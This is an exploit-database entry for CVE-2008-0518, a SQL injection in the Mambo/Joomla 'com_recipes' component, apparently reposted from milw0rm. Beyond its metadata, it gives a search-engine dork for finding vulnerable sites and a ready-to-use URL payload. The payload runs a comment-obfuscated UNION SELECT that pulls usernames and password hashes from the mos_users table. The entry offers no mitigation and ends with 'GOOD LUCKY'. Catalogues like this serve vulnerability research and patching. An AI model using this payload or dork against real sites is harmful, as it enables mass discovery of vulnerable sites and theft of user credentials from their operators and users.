[] NeoSense

Mambo Component Recipes 1.00 - 'id' SQL Injection

Author: S@BUN
type: webapps
platform: php
port: 
date_added: 2008-01-29 
date_updated: 2016-11-09 
verified: 1 
codes: OSVDB-41259;CVE-2008-0518 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################################
#
# joomla SQL Injection(com_recipes)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_recipes"
#
########################################################################
EXPLOIT :

index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*

#########################################################################
# S@BUN              www.hackturkiye.com                       S@BUN
#########################################################################
# S@BUN                  GOOD LUCKY                             S@BUN
#########################################################################

# milw0rm.com [2008-01-30]